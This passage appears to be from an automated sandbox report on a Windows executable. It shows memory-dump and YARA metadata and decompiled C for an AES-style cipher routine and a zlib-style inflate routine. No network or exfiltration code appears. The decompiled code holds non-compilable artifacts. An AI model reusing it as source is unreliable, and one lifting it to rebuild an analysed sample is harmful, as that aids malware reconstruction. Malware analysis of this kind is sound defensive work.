                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: ??0exception@@ExceptionThrow
                • String ID:
                • API String ID: 941485209-0
                • Opcode ID: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
                • Instruction ID: 7c46eb61736c4a52f21da4615b0110659747632e7974af7727d2e67ead4b8ec0
                • Opcode Fuzzy Hash: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
                • Instruction Fuzzy Hash: 01B1AD75A081D99EDB05CFB989A04EAFFF2AF4E20474ED1E9C5C4AB313C5306505DB98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004031BC Relevance: 3.3, APIs: 2, Instructions: 271COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 33%
                			E004031BC(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
				signed int _v8;
				void* _v9;
				void* _v10;
				void* _v11;
				signed int _v12;
				void* _v13;
				void* _v14;
				void* _v15;
				signed int _v16;
				void* _v17;
				void* _v18;
				void* _v19;
				signed int _v20;
				void* _v21;
				void* _v22;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v48;
				signed char* _t154;
				signed char* _t157;
				signed char* _t158;
				signed char* _t161;
				signed char* _t162;
				signed char* _t165;
				signed int _t169;
				signed int _t170;
				signed char* _t175;
				signed int _t243;
				signed int _t278;
				signed int _t288;
				signed int _t302;
				signed int* _t328;
				signed int _t332;
				signed int* _t342;
				intOrPtr _t343;
				void* _t344;
				signed int _t345;

				_t343 = __ecx;
				_v32 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v48);
					L0040776E();
				}
				_t154 = _a4;
				_t157 =  &(_t154[3]);
				_t158 =  &(_t157[1]);
				_t243 = (( *_t154 & 0x000000ff) << 0x00000018 | (_t154[1] & 0x000000ff) << 0x00000010 |  *_t157 & 0x000000ff) ^  *(_t343 + 0x1e8);
				_v24 = _t243;
				_t161 =  &(_t158[3]);
				_t162 =  &(_t161[1]);
				_v20 = ((_t157[1] & 0x000000ff) << 0x00000018 | (_t158[1] & 0x000000ff) << 0x00000010 |  *_t161 & 0x000000ff) ^  *(_t343 + 0x1ec);
				_t165 =  &(_t162[3]);
				_t166 =  &(_t165[1]);
				_v16 = (( *_t162 & 0x000000ff) << 0x00000018 | (_t162[1] & 0x000000ff) << 0x00000010 |  *_t165 & 0x000000ff) ^  *(_t343 + 0x1f0);
				_t169 =  *(_t343 + 0x410);
				_v36 = _t169;
				_v12 = ((_t165[1] & 0x000000ff) << 0x00000018 | (_t166[1] & 0x000000ff) << 0x00000010) ^  *(_t343 + 0x1f4);
				if(_t169 > 1) {
					_t328 = _t343 + 0x210;
					_a4 = _t328;
					_v8 = _t169 - 1;
					do {
						_t332 =  *0x00409BFC ^  *0x00409FFC;
						_v28 = _t332;
						_v28 = _t332 ^  *0x0040A3FC ^  *(0x40a7fc + (_t243 & 0x000000ff) * 4) ^ _a4[1];
						_v16 =  *0x00409BFC ^  *0x00409FFC ^  *0x0040A3FC ^  *(0x40a7fc + (_v12 & 0x000000ff) * 4) ^  *_t328;
						_v12 = _v28;
						_v20 =  *0x0040A3FC ^  *0x00409BFC ^  *0x00409FFC ^  *(0x40a7fc + (_v16 & 0x000000ff) * 4) ^  *(_t328 - 4);
						_t342 = _a4;
						_t243 =  *0x00409FFC ^  *0x0040A3FC ^  *0x00409BFC ^  *(0x40a7fc + (_v20 & 0x000000ff) * 4) ^  *(_t342 - 8);
						_t328 = _t342 + 0x20;
						_t82 =  &_v8;
						 *_t82 = _v8 - 1;
						_a4 = _t328;
						_v24 = _t243;
					} while ( *_t82 != 0);
					_t343 = _v32;
					_t169 = _v36;
				}
				_t170 = _t169 << 5;
				_t278 =  *(_t343 + 0x1e8 + _t170);
				_t344 = _t343 + 0x1e8 + _t170;
				_v8 = _t278;
				_t175 = _a8;
				 *_t175 =  *0x00408AFC ^ _t278 >> 0x00000018;
				_t175[1] =  *0x00408AFC ^ _t278 >> 0x00000010;
				_t175[2] =  *0x00408AFC ^ _v8 >> 0x00000008;
				_t175[3] =  *((_v20 & 0x000000ff) + 0x408afc) ^ _v8;
				_t288 =  *(_t344 + 4);
				_v8 = _t288;
				_t175[4] =  *0x00408AFC ^ _t288 >> 0x00000018;
				_t175[5] =  *0x00408AFC ^ _v8 >> 0x00000010;
				_t175[6] =  *0x00408AFC ^ _v8 >> 0x00000008;
				_t175[7] =  *((_v16 & 0x000000ff) + 0x408afc) ^ _v8;
				_t302 =  *(_t344 + 8);
				_v8 = _t302;
				_t175[8] =  *0x00408AFC ^ _t302 >> 0x00000018;
				_t175[9] =  *0x00408AFC ^ _v8 >> 0x00000010;
				_t175[0xa] =  *0x00408AFC ^ _v8 >> 0x00000008;
				_t175[0xb] =  *((_v12 & 0x000000ff) + 0x408afc) ^ _v8;
				_t345 =  *(_t344 + 0xc);
				_v8 = _t345;
				_t175[0xc] =  *0x00408AFC ^ _t345 >> 0x00000018;
				_t175[0xd] =  *0x00408AFC ^ _t345 >> 0x00000010;
				_t175[0xe] =  *0x00408AFC ^ _t345 >> 0x00000008;
				_t175[0xf] =  *((_t243 & 0x000000ff) + 0x408afc) ^ _v8;
				return _t175;
			}










































                0x004031c3
                0x004031c5
                0x004031cc
                0x004031d6
                0x004031df
                0x004031e4
                0x004031e5
                0x004031e5
                0x004031ea
                0x00403206
                0x00403210
                0x00403211
                0x0040321f
                0x0040322e
                0x00403234
                0x0040323f
                0x00403255
                0x0040325b
                0x00403266
                0x0040327d
                0x00403285
                0x00403296
                0x00403299
                0x0040329f
                0x004032a6
                0x004032a9
                0x004032ac
                0x00403323
                0x0040332f
                0x0040334b
                0x0040335a
                0x0040336c
                0x0040337b
                0x00403385
                0x00403388
                0x0040338b
                0x0040338e
                0x0040338e
                0x00403391
                0x00403394
                0x00403394
                0x0040339d
                0x004033a0
                0x004033a0
                0x004033a3
                0x004033a6
                0x004033ad
                0x004033bb
                0x004033cb
                0x004033ce
                0x004033e5
                0x004033f8
                0x0040340c
                0x0040340f
                0x00403418
                0x00403425
                0x00403439
                0x0040344e
                0x00403462
                0x00403465
                0x0040346e
                0x0040347b
                0x0040348f
                0x004034a1
                0x004034b5
                0x004034b8
                0x004034c2
                0x004034d2
                0x004034e7
                0x004034fb
                0x00403508
                0x0040350c

                APIs
                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031D6
                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031E5
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: ??0exception@@ExceptionThrow
                • String ID:
                • API String ID: 941485209-0
                • Opcode ID: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
                • Instruction ID: bcf4991698fce177fafabfcfbf4d003d7da0a1e91b0dfae35dbc96c431f9713a
                • Opcode Fuzzy Hash: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
                • Instruction Fuzzy Hash: 43B1A135A081D99EDB05CFB984A04EAFFF2AF8E200B4ED1E6C9D4AB713C5705615DB84
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004043B7 Relevance: 1.9, APIs: 1, Instructions: 682COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 89%
                			E004043B7() {
				void* __ebx;
				void** __edi;
				void* __esi;
				signed int _t426;
				signed int _t427;
				void* _t434;
				signed int _t436;
				unsigned int _t438;
				void* _t442;
				void* _t448;
				void* _t455;
				signed int _t456;
				signed int _t461;
				signed char* _t476;
				signed int _t482;
				signed int _t485;
				signed int* _t488;
				void* _t490;
				void* _t492;
				void* _t493;

				_t490 = _t492;
				_t493 = _t492 - 0x2c;
				_t488 =  *(_t490 + 8);
				_t485 =  *(_t490 + 0xc);
				_t482 = _t488[0xd];
				_t476 =  *_t485;
				 *(_t490 - 4) =  *(_t485 + 4);
				 *(_t490 + 8) = _t488[8];
				 *(_t490 + 0xc) = _t488[7];
				_t426 = _t488[0xc];
				 *(_t490 - 8) = _t482;
				if(_t482 >= _t426) {
					_t479 = _t488[0xb] - _t482;
					__eflags = _t479;
				} else {
					_t479 = _t426 - _t482 - 1;
				}
				_t427 =  *_t488;
				 *(_t490 - 0x10) = _t479;
				if(_t427 > 9) {
					L99:
					_push(0xfffffffe);
					_t488[8] =  *(_t490 + 8);
					_t488[7] =  *(_t490 + 0xc);
					 *(_t485 + 4) =  *(_t490 - 4);
					 *_t485 = _t476;
					_t320 = _t485 + 8;
					 *_t320 =  *(_t485 + 8) + _t476 -  *_t485;
					__eflags =  *_t320;
					_t488[0xd] =  *(_t490 - 8);
					goto L100;
				} else {
					while(1) {
						switch( *((intOrPtr*)(_t427 * 4 +  &M00404BBD))) {
							case 0:
								goto L7;
							case 1:
								goto L20;
							case 2:
								goto L27;
							case 3:
								goto L50;
							case 4:
								goto L58;
							case 5:
								goto L68;
							case 6:
								goto L92;
							case 7:
								goto L118;
							case 8:
								goto L122;
							case 9:
								goto L104;
						}
						L92:
						__eax =  *(__ebp + 8);
						 *(__esi + 0x20) =  *(__ebp + 8);
						__eax =  *(__ebp + 0xc);
						 *(__esi + 0x1c) =  *(__ebp + 0xc);
						__eax =  *(__ebp - 4);
						__edi[1] =  *(__ebp - 4);
						__ebx = __ebx -  *__edi;
						 *__edi = __ebx;
						__edi[2] = __edi[2] + __ebx -  *__edi;
						__eax =  *(__ebp - 8);
						 *(__esi + 0x34) =  *(__ebp - 8);
						__eax = E00403CFC(__esi, __edi,  *(__ebp + 0x10));
						__eflags = __eax - 1;
						if(__eax != 1) {
							L120:
							_push(__eax);
							L100:
							_push(_t485);
							_push(_t488);
							_t434 = E00403BD6(_t479);
							L101:
							return _t434;
						}
						 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
						E004042AF( *(__esi + 4), __edi) = __edi[1];
						__ebx =  *__edi;
						 *(__ebp - 4) = __edi[1];
						__eax =  *(__esi + 0x20);
						_pop(__ecx);
						 *(__ebp + 8) =  *(__esi + 0x20);
						__eax =  *(__esi + 0x1c);
						_pop(__ecx);
						__ecx =  *(__esi + 0x34);
						 *(__ebp + 0xc) =  *(__esi + 0x1c);
						__eax =  *(__esi + 0x30);
						 *(__ebp - 8) = __ecx;
						__eflags = __ecx - __eax;
						if(__ecx >= __eax) {
							__eax =  *(__esi + 0x2c);
							__eax =  *(__esi + 0x2c) -  *(__ebp - 8);
							__eflags = __eax;
						} else {
							__eax = __eax - __ecx;
							__eax = __eax - 1;
						}
						__eflags =  *(__esi + 0x18);
						 *(__ebp - 0x10) = __eax;
						if( *(__esi + 0x18) != 0) {
							 *__esi = 7;
							goto L118;
						} else {
							 *__esi =  *__esi & 0x00000000;
							__eflags =  *__esi;
							L98:
							_t427 =  *_t488;
							__eflags = _t427 - 9;
							if(_t427 <= 9) {
								_t479 =  *(_t490 - 0x10);
								continue;
							}
							goto L99;
						}
						while(1) {
							L68:
							__eax =  *(__esi + 4);
							__ecx =  *(__esi + 8);
							__edx = __eax;
							__eax = __eax & 0x0000001f;
							__edx = __edx >> 5;
							__edx = __edx & 0x0000001f;
							_t187 = __eax + 0x102; // 0x102
							__eax = __edx + _t187;
							__eflags = __ecx - __edx + _t187;
							if(__ecx >= __edx + _t187) {
								break;
							}
							__eax =  *(__esi + 0x10);
							while(1) {
								__eflags =  *(__ebp + 0xc) - __eax;
								if( *(__ebp + 0xc) >= __eax) {
									break;
								}
								__eflags =  *(__ebp - 4);
								if( *(__ebp - 4) == 0) {
									L107:
									_t488[8] =  *(_t490 + 8);
									_t488[7] =  *(_t490 + 0xc);
									_t349 = _t485 + 4;
									 *_t349 =  *(_t485 + 4) & 0x00000000;
									__eflags =  *_t349;
									L108:
									_push( *(_t490 + 0x10));
									 *_t485 = _t476;
									 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
									_t488[0xd] =  *(_t490 - 8);
									goto L100;
								}
								__edx =  *__ebx & 0x000000ff;
								__ecx =  *(__ebp + 0xc);
								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
								 *(__ebp - 4) =  *(__ebp - 4) - 1;
								__edx = ( *__ebx & 0x000000ff) << __cl;
								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
								__ebx = __ebx + 1;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
							}
							__eax =  *(0x40bca8 + __eax * 4);
							__ecx =  *(__esi + 0x14);
							__eax = __eax &  *(__ebp + 8);
							__edx =  *(__ecx + 4 + __eax * 8);
							__eax = __ecx + __eax * 8;
							__eflags = __edx - 0x10;
							 *(__ebp - 0x14) = __edx;
							__ecx =  *(__eax + 1) & 0x000000ff;
							 *(__ebp - 0xc) = __ecx;
							if(__edx >= 0x10) {
								__eflags = __edx - 0x12;
								if(__edx != 0x12) {
									_t222 = __edx - 0xe; // -14
									__eax = _t222;
								} else {
									__eax = 7;
								}
								__ecx = 0;
								__eflags = __edx - 0x12;
								0 | __eflags != 0x00000000 = (__eflags != 0) - 1;
								__ecx = (__eflags != 0x00000000) - 0x00000001 & 0x00000008;
								__ecx = ((__eflags != 0x00000000) - 0x00000001 & 0x00000008) + 3;
								__eflags = __ecx;
								 *(__ebp - 0x10) = __ecx;
								while(1) {
									__ecx =  *(__ebp - 0xc);
									__edx = __eax + __ecx;
									__eflags =  *(__ebp + 0xc) - __eax + __ecx;
									if( *(__ebp + 0xc) >= __eax + __ecx) {
										break;
									}
									__eflags =  *(__ebp - 4);
									if( *(__ebp - 4) == 0) {
										goto L107;
									}
									__edx =  *__ebx & 0x000000ff;
									__ecx =  *(__ebp + 0xc);
									 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
									 *(__ebp - 4) =  *(__ebp - 4) - 1;
									__edx = ( *__ebx & 0x000000ff) << __cl;
									 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
									__ebx = __ebx + 1;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
								}
								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
								 *(0x40bca8 + __eax * 4) =  *(0x40bca8 + __eax * 4) &  *(__ebp + 8);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) + ( *(0x40bca8 + __eax * 4) &  *(__ebp + 8));
								__ecx = __eax;
								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
								__ecx =  *(__ebp - 0xc);
								__eax = __eax +  *(__ebp - 0xc);
								__ecx =  *(__esi + 8);
								 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
								__eax =  *(__esi + 4);
								__edx = __eax;
								__eax = __eax & 0x0000001f;
								__edx = __edx >> 5;
								__edx = __edx & 0x0000001f;
								_t254 = __eax + 0x102; // 0x102
								__eax = __edx + _t254;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) + __ecx;
								__eflags =  *(__ebp - 0x10) + __ecx - __eax;
								if( *(__ebp - 0x10) + __ecx > __eax) {
									L111:
									__edi[9](__edi[0xa],  *(__esi + 0xc)) =  *(__ebp + 8);
									 *__esi = 9;
									__edi[6] = "invalid bit length repeat";
									 *(__esi + 0x20) =  *(__ebp + 8);
									__eax =  *(__ebp + 0xc);
									 *(__esi + 0x1c) =  *(__ebp + 0xc);
									__eax =  *(__ebp - 4);
									__edi[1] =  *(__ebp - 4);
									__ebx = __ebx -  *__edi;
									 *__edi = __ebx;
									__edi[2] = __edi[2] + __ebx -  *__edi;
									__eax =  *(__ebp - 8);
									 *(__esi + 0x34) =  *(__ebp - 8);
									__eax = E00403BD6(__ecx, __esi, __edi, 0xfffffffd);
									goto L101;
								}
								__eflags =  *(__ebp - 0x14) - 0x10;
								if( *(__ebp - 0x14) != 0x10) {
									__eax = 0;
									__eflags = 0;
									do {
										L87:
										__edx =  *(__esi + 0xc);
										 *( *(__esi + 0xc) + __ecx * 4) = __eax;
										__ecx = __ecx + 1;
										_t264 = __ebp - 0x10;
										 *_t264 =  *(__ebp - 0x10) - 1;
										__eflags =  *_t264;
									} while ( *_t264 != 0);
									 *(__esi + 8) = __ecx;
									continue;
								}
								__eflags = __ecx - 1;
								if(__ecx < 1) {
									goto L111;
								}
								__eax =  *(__esi + 0xc);
								__eax =  *( *(__esi + 0xc) + __ecx * 4 - 4);
								goto L87;
							}
							 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
							__eax = __ecx;
							__ecx =  *(__esi + 0xc);
							 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
							__eax =  *(__esi + 8);
							 *( *(__esi + 0xc) +  *(__esi + 8) * 4) = __edx;
							 *(__esi + 8) =  *(__esi + 8) + 1;
						}
						__ecx = __ebp - 0x28;
						__eax =  *(__esi + 4);
						 *(__esi + 0x14) =  *(__esi + 0x14) & 0x00000000;
						 *(__ebp - 0x14) = 9;
						__ebp - 0x2c = __ebp - 0x10;
						__ecx = __ebp - 0x14;
						__ecx = __eax;
						__eax = __eax & 0x0000001f;
						__ecx = __ecx >> 5;
						__ecx = __ecx & 0x0000001f;
						__eax = __eax + 0x101;
						__ecx = __ecx + 1;
						 *(__ebp - 0x10) = 6;
						__eax = E0040501F(__eax, __ecx,  *(__esi + 0xc), __ebp - 0x14, __ebp - 0x10, __ebp - 0x2c, __ebp - 0x28,  *((intOrPtr*)(__esi + 0x24)), __edi);
						 *(__ebp - 0xc) = __eax;
						__eflags = __eax;
						if(__eax != 0) {
							__eflags =  *(__ebp - 0xc) - 0xfffffffd;
							L113:
							if(__eflags == 0) {
								__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
								_pop(__ecx);
								 *__esi = 9;
								_pop(__ecx);
							}
							__eax =  *(__ebp + 8);
							_push( *(__ebp - 0xc));
							 *(__esi + 0x20) =  *(__ebp + 8);
							__eax =  *(__ebp + 0xc);
							 *(__esi + 0x1c) =  *(__ebp + 0xc);
							__eax =  *(__ebp - 4);
							__edi[1] =  *(__ebp - 4);
							__ebx = __ebx -  *__edi;
							 *__edi = __ebx;
							__edi[2] = __edi[2] + __ebx -  *__edi;
							__eax =  *(__ebp - 8);
							 *(__esi + 0x34) =  *(__ebp - 8);
							goto L100;
						}
						__eax = E00403CC8( *(__ebp - 0x14),  *(__ebp - 0x10),  *((intOrPtr*)(__ebp - 0x2c)),  *(__ebp - 0x28), __edi);
						__eflags = __eax;
						if(__eax == 0) {
							L116:
							_push(0xfffffffc);
							_t488[8] =  *(_t490 + 8);
							_t488[7] =  *(_t490 + 0xc);
							 *(_t485 + 4) =  *(_t490 - 4);
							 *_t485 = _t476;
							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
							_t488[0xd] =  *(_t490 - 8);
							goto L100;
						}
						 *(__esi + 4) = __eax;
						__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
						_pop(__ecx);
						 *__esi = 6;
						_pop(__ecx);
						goto L92;
						L58:
						 *(__esi + 4) =  *(__esi + 4) >> 0xa;
						__eax = ( *(__esi + 4) >> 0xa) + 4;
						__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
						if( *(__esi + 8) >= ( *(__esi + 4) >> 0xa) + 4) {
							while(1) {
								L64:
								__eflags =  *(__esi + 8) - 0x13;
								if( *(__esi + 8) >= 0x13) {
									break;
								}
								__eax =  *(__esi + 8);
								__ecx =  *(__esi + 0xc);
								 *(__ecx +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) & 0x00000000;
								 *(__esi + 8) =  *(__esi + 8) + 1;
							}
							__ecx = __esi + 0x14;
							__eax = __esi + 0x10;
							 *(__esi + 0x10) = 7;
							__eax = E00404FA0( *(__esi + 0xc), __eax, __ecx,  *((intOrPtr*)(__esi + 0x24)), __edi);
							 *(__ebp - 0xc) = __eax;
							__eflags = __eax;
							if(__eax != 0) {
								__eflags =  *(__ebp - 0xc) - 0xfffffffd;
								goto L113;
							}
							_t182 = __esi + 8;
							 *_t182 =  *(__esi + 8) & __eax;
							__eflags =  *_t182;
							 *__esi = 5;
							goto L68;
						} else {
							goto L59;
						}
						do {
							L59:
							__ecx =  *(__ebp + 0xc);
							while(1) {
								__eflags = __ecx - 3;
								if(__ecx >= 3) {
									goto L63;
								}
								__eflags =  *(__ebp - 4);
								if( *(__ebp - 4) == 0) {
									goto L107;
								}
								__eax =  *__ebx & 0x000000ff;
								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
								 *(__ebp - 4) =  *(__ebp - 4) - 1;
								__eax = ( *__ebx & 0x000000ff) << __cl;
								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
								__ebx = __ebx + 1;
								__ecx = __ecx + 8;
								 *(__ebp + 0xc) = __ecx;
							}
							L63:
							__ecx =  *(__esi + 8);
							__eax =  *(__ebp + 8);
							__edx =  *(__esi + 0xc);
							__eax =  *(__ebp + 8) & 0x00000007;
							__ecx =  *(0x40cdf0 +  *(__esi + 8) * 4);
							 *(__ebp + 0xc) =  *(__ebp + 0xc) - 3;
							 *(__ebp + 8) =  *(__ebp + 8) >> 3;
							 *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *(__ebp + 8) & 0x00000007;
							__ecx =  *(__esi + 4);
							 *(__esi + 8) =  *(__esi + 8) + 1;
							__eax =  *(__esi + 8);
							 *(__esi + 4) >> 0xa = ( *(__esi + 4) >> 0xa) + 4;
							__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
						} while ( *(__esi + 8) < ( *(__esi + 4) >> 0xa) + 4);
						goto L64;
						L50:
						__ecx =  *(__ebp + 0xc);
						while(1) {
							__eflags = __ecx - 0xe;
							if(__ecx >= 0xe) {
								break;
							}
							__eflags =  *(__ebp - 4);
							if( *(__ebp - 4) == 0) {
								goto L107;
							}
							__eax =  *__ebx & 0x000000ff;
							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
							 *(__ebp - 4) =  *(__ebp - 4) - 1;
							__eax = ( *__ebx & 0x000000ff) << __cl;
							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
							__ebx = __ebx + 1;
							__ecx = __ecx + 8;
							 *(__ebp + 0xc) = __ecx;
						}
						__eax =  *(__ebp + 8);
						__eax =  *(__ebp + 8) & 0x00003fff;
						__ecx = __eax;
						 *(__esi + 4) = __eax;
						__ecx = __eax & 0x0000001f;
						__eflags = __ecx - 0x1d;
						if(__ecx > 0x1d) {
							L109:
							 *__esi = 9;
							__edi[6] = "too many length or distance symbols";
							break;
						}
						__eax = __eax & 0x000003e0;
						__eflags = (__eax & 0x000003e0) - 0x3a0;
						if((__eax & 0x000003e0) > 0x3a0) {
							goto L109;
						}
						__eax = __eax >> 5;
						__eax = __eax & 0x0000001f;
						__eax = __edi[8](__edi[0xa], __eax, 4);
						__esp = __esp + 0xc;
						 *(__esi + 0xc) = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							goto L116;
						}
						 *(__ebp + 8) =  *(__ebp + 8) >> 0xe;
						 *(__ebp + 0xc) =  *(__ebp + 0xc) - 0xe;
						_t138 = __esi + 8;
						 *_t138 =  *(__esi + 8) & 0x00000000;
						__eflags =  *_t138;
						 *__esi = 4;
						goto L58;
						L27:
						__eflags =  *(__ebp - 4);
						if( *(__ebp - 4) == 0) {
							goto L107;
						}
						__eflags = __ecx;
						if(__ecx != 0) {
							L44:
							__eax =  *(__esi + 4);
							__ecx =  *(__ebp - 4);
							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
							__eflags = __eax - __ecx;
							 *(__ebp - 0xc) = __eax;
							if(__eax > __ecx) {
								 *(__ebp - 0xc) = __ecx;
							}
							__eax =  *(__ebp - 0x10);
							__eflags =  *(__ebp - 0xc) - __eax;
							if( *(__ebp - 0xc) > __eax) {
								 *(__ebp - 0xc) = __eax;
							}
							__eax = memcpy( *(__ebp - 8), __ebx,  *(__ebp - 0xc));
							__eax =  *(__ebp - 0xc);
							__esp = __esp + 0xc;
							 *(__ebp - 4) =  *(__ebp - 4) - __eax;
							 *(__ebp - 8) =  *(__ebp - 8) + __eax;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __eax;
							__ebx = __ebx + __eax;
							_t115 = __esi + 4;
							 *_t115 =  *(__esi + 4) - __eax;
							__eflags =  *_t115;
							if( *_t115 == 0) {
								L49:
								 *(__esi + 0x18) =  ~( *(__esi + 0x18));
								asm("sbb eax, eax");
								__eax =  ~( *(__esi + 0x18)) & 0x00000007;
								L16:
								 *_t488 = _t456;
							}
							goto L98;
						}
						__ecx =  *(__esi + 0x2c);
						__eflags = __edx - __ecx;
						if(__edx != __ecx) {
							L35:
							__eax =  *(__ebp - 8);
							 *(__esi + 0x34) =  *(__ebp - 8);
							__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
							__ecx =  *(__esi + 0x30);
							 *(__ebp + 0x10) = __eax;
							__eax =  *(__esi + 0x34);
							__eflags = __eax - __ecx;
							 *(__ebp - 8) = __eax;
							if(__eax >= __ecx) {
								__edx =  *(__esi + 0x2c);
								__edx =  *(__esi + 0x2c) -  *(__ebp - 8);
								__eflags = __edx;
								 *(__ebp - 0x10) = __edx;
							} else {
								__ecx = __ecx -  *(__ebp - 8);
								__eax = __ecx -  *(__ebp - 8) - 1;
								 *(__ebp - 0x10) = __ecx -  *(__ebp - 8) - 1;
							}
							__edx =  *(__esi + 0x2c);
							__eflags =  *(__ebp - 8) - __edx;
							if( *(__ebp - 8) == __edx) {
								__eax =  *(__esi + 0x28);
								__eflags = __eax - __ecx;
								if(__eflags != 0) {
									 *(__ebp - 8) = __eax;
									if(__eflags >= 0) {
										__edx = __edx - __eax;
										__eflags = __edx;
										 *(__ebp - 0x10) = __edx;
									} else {
										__ecx = __ecx - __eax;
										__ecx = __ecx - 1;
										 *(__ebp - 0x10) = __ecx;
									}
								}
							}
							__eflags =  *(__ebp - 0x10);
							if( *(__ebp - 0x10) == 0) {
								__eax =  *(__ebp + 8);
								 *(__esi + 0x20) =  *(__ebp + 8);
								__eax =  *(__ebp + 0xc);
								 *(__esi + 0x1c) =  *(__ebp + 0xc);
								__eax =  *(__ebp - 4);
								__edi[1] =  *(__ebp - 4);
								goto L108;
							} else {
								goto L44;
							}
						}
						__eax =  *(__esi + 0x30);
						__edx =  *(__esi + 0x28);
						__eflags = __edx - __eax;
						if(__eflags == 0) {
							goto L35;
						}
						 *(__ebp - 8) = __edx;
						if(__eflags >= 0) {
							__ecx = __ecx - __edx;
							__eflags = __ecx;
							 *(__ebp - 0x10) = __ecx;
						} else {
							__eax = __eax - __edx;
							 *(__ebp - 0x10) = __eax;
						}
						__eflags =  *(__ebp - 0x10);
						if( *(__ebp - 0x10) != 0) {
							goto L44;
						} else {
							goto L35;
						}
						L20:
						__ecx =  *(__ebp + 0xc);
						while(1) {
							__eflags = __ecx - 0x20;
							if(__ecx >= 0x20) {
								break;
							}
							__eflags =  *(__ebp - 4);
							if( *(__ebp - 4) == 0) {
								goto L107;
							}
							__eax =  *__ebx & 0x000000ff;
							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
							 *(__ebp - 4) =  *(__ebp - 4) - 1;
							__eax = ( *__ebx & 0x000000ff) << __cl;
							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
							__ebx = __ebx + 1;
							__ecx = __ecx + 8;
							 *(__ebp + 0xc) = __ecx;
						}
						__ecx =  *(__ebp + 8);
						__eax =  *(__ebp + 8);
						__ecx =  !( *(__ebp + 8));
						__eax =  *(__ebp + 8) & 0x0000ffff;
						__ecx =  !( *(__ebp + 8)) >> 0x10;
						__ecx =  !( *(__ebp + 8)) >> 0x00000010 ^ __eax;
						__eflags = __ecx;
						if(__ecx != 0) {
							 *__esi = 9;
							__edi[6] = "invalid stored block lengths";
							break;
						}
						 *(__esi + 4) = __eax;
						__eax = 0;
						__eflags =  *(__esi + 4);
						 *(__ebp + 0xc) = 0;
						 *(__ebp + 8) = 0;
						if( *(__esi + 4) == 0) {
							goto L49;
						}
						__eax = 2;
						goto L16;
						L7:
